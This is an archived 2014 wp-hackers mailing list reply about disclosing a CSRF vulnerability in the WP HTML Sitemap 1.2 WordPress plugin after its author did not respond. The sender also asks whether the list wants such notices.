[wp-hackers] CSRF vulnerability in WP HTML Sitemap 1.2 (WordPress plugin)

Harry Metcalfe harry at dxw.com
Fri Mar 28 14:46:00 UTC 2014

Hi Daniel,

This vulnerability was reported to plugins at wordpress.org on 2nd
February. The author has not responded, so we are disclosing the
vulnerability in order that anyone using this plugin can take steps to
protect themselves.

This is certainly not an advertisement.

Administrivia: It was my assumption that this list would be interested
to know about vulnerable plugins. If anyone has strong feelings for or
against that assumption, please let me know off-list. If there is a
consensus we will honour it.

Cheers,

Harry

Harry Metcalfe